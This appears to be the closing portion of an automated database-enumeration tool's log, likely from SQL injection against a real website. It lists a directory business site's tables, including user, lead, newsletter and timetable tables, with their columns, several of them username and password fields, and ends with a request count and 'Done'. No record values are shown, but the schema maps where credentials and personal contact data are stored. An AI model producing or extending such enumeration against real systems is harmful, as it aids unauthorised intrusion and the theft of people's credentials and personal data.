[48]hfc_freelist: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable
[49]hfc_freelist_business: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions,DirectoryType,CategoryBusiness,ServiceCategory,CityBusiness
[50]hfc_freelist_test: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable
[51]hfc_leads: id,userid,action,dateadded,dateviewed,firstname,lastname,email,phone,addr1,addr2,state,postcode,comment,alert
[52]hfc_standard: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink
[53]hfc_standard_offer: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions
[54]hfc_standard_offer_golive: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions
[55]hfc_temp: id,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink
[56]lms: id,firstname,lastname,email,phone,centre,password,dateadded
[57]mgcc_events: event_id,type,date,event,desc,link
[58]mgcc_results: result_id,type,month,year,event,desc,link
[59]newsletter: userid,FirstName,LastName,Email1,Addr1,Addr2,State,Zip,Phone1,Mobile,Date
[60]old_stats: userid,timestamp,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[61]stats: userid,timestamp,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[62]stats06b: id,userid,browser,ip,recieved,month,timestamp,Category,City,Suburb,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[63]stats07b: id,userid,browser,ip,recieved,month,timestamp,Category,City,Suburb,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[64]stats_b: id,userid,browser,ip,recieved,month,timestamp,Category,City,Suburb,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[65]stats_type: id,type
[66]tt_class: id,class_id,venue_id,client_id,type_id,instructor_id,duration,day,time,description,note
[67]tt_class_old: class_id,venue_id,type_id,instructor_id,duration,mon,tue,wed,thu,fri,sat,sun,logo,description,desc_mon,desc_tue,desc_wed,desc_thu,desc_fri,desc_sat,desc_sun
[68]tt_client: client_id,client,logo,bg_c,bg_i,bg_r,tb_b_w,tb_b_c,tb_hd_bg_c,tb_hd_bg_i,tb_hd_bg_r,tb_hd_f_c,tb_cls_bg_c,tb_cls_f_c,tb_wd_bg_c,tb_wd_f_c,tb_t_bg_c,tb_t_f_c,tb_empty_c,tb_cl_bg_c,tb_cl_f_c,tb_uc_f_c,username,password,date_added,date_changed
[69]tt_instructor: instructor_id,firstname,surname,client_id,description
[70]tt_type: type_id,type,client_id,description,intensity,logo
[71]tt_venue: venue_id,client_id,venue,interval,date_added,date_changed,addr1,addr2,city,state,int_state,postcode,country,email,phone,fax,url,logo

[-] [13:43:36]
[-] Total URL Requests 1016
[-] Done